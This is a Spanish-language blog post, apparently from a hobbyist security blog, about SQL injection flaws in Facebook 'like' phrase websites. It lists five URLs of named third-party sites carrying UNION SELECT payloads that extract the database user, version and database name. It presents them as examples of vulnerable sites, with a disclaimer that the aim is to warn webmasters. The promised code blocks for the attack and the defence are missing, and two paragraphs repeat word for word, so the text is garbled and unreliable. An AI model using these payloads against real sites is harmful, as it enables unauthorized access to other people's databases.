Navegando por la red y curioseando en estos sitios populares de frases de me gusta de facebook, se puede observar que presentan pocas medidas de seguridad, la cual generá posibilidades de inyección o ataques XSS, acontinuación les mostrare una vulnerabilidad presentada en muchos de estos sitios que no tienen medidas de seguridad y no modifican las url amigables.
Ahora los códigos que usaremos para las inyecciones son 3 tipos y serán los siguientes: La mayoría de estos sistemas generan cada página y cada frase de la siguiente manera: cuando me refiero a "Seguido del número de frase" quiero decir que las páginas que contienen cada frase se generan con un numero predeterminado, si hay 100 frases publicadas, ese será el número, ok bueno, vamos a explotar la vulnerabilidad de la siguiente manera. Gracias a ese pequeño conjunto de códigos, podremos obtener el nombre usuario del hosting y/o de la base de datos del sitio, si quieren ejemplos más claros les dejaré un listado de webs con esta vulnerabilidad.
Con este artículo no estoy dando paso a hackers para explotar estas vulnerabilidades, personalmente mi función como dueño de este blog es ayudar no dañar, este artículo para mi es como un llamado a los WebMasters de estas webs y a los que quieren iniciar un proyecto con este tipo de script que coloquen seguridad al máximo y evitar este tipo de incidentes, bueno tal vez me encuentre un sitio tan vulnerable que yo mismo lo edite y le añada un sistema de seguridad más complejo, bueno a medida del tiempo voy a ir mostrando nuevas vulnerabilidades sobre estos sitios ya que añadí está categoría a mi blog y me apasiona mucho esto, bien en fin, precauciones a la hora de realizar sus sitios web saludos.
Ahora los códigos que usaremos para las inyecciones son 3 tipos y serán los siguientes: La mayoría de estos sistemas generan cada página y cada frase de la siguiente manera: cuando me refiero a "Seguido del número de frase" quiero decir que las páginas que contienen cada frase se generan con un numero predeterminado, si hay 100 frases publicadas, ese será el número, ok bueno, vamos a explotar la vulnerabilidad de la siguiente manera. Gracias a ese pequeño conjunto de códigos, podremos obtener el nombre usuario del hosting y/o de la base de datos del sitio, si quieren ejemplos más claros les dejaré un listado de webs con esta vulnerabilidad.
- http://m55845.mimejorfrase.net/frase.php?id=162779+and+1=0+union+select+1,user%28%29,3+--+
- http://megusta.mx/like.php?id=7+and+1=0+union+select+1,user%28%29,3+--+
- http://mis.frasesdeface.net/megusta.php?id=52225+and+1=0+union+select+all+1,concat%28user%28%29,version%28%29,database%28%29%29,3
- http://frasesinolvidables.net/frase.php?id=108766+and+1=0+union+select+all+1,concat%28user%28%29,version%28%29,database%28%29%29,3--
- http://www.es.lomejorenfrases.net/megusta.php?id=44943+and+1=0+union+select+all+1,concat(user(),version(),database()),3--
¿Como proteger mi sitio de frases Facebook?
Quiero darles una información bien amplia adicional para que utilicen este método para proteger su sitio de frases, a continuación una serie de códigos de seguridad: Un ejemplo para utilizar está función seria: y ese sería un ejemplo de protección.Con este artículo no estoy dando paso a hackers para explotar estas vulnerabilidades, personalmente mi función como dueño de este blog es ayudar no dañar, este artículo para mi es como un llamado a los WebMasters de estas webs y a los que quieren iniciar un proyecto con este tipo de script que coloquen seguridad al máximo y evitar este tipo de incidentes, bueno tal vez me encuentre un sitio tan vulnerable que yo mismo lo edite y le añada un sistema de seguridad más complejo, bueno a medida del tiempo voy a ir mostrando nuevas vulnerabilidades sobre estos sitios ya que añadí está categoría a mi blog y me apasiona mucho esto, bien en fin, precauciones a la hora de realizar sus sitios web saludos.
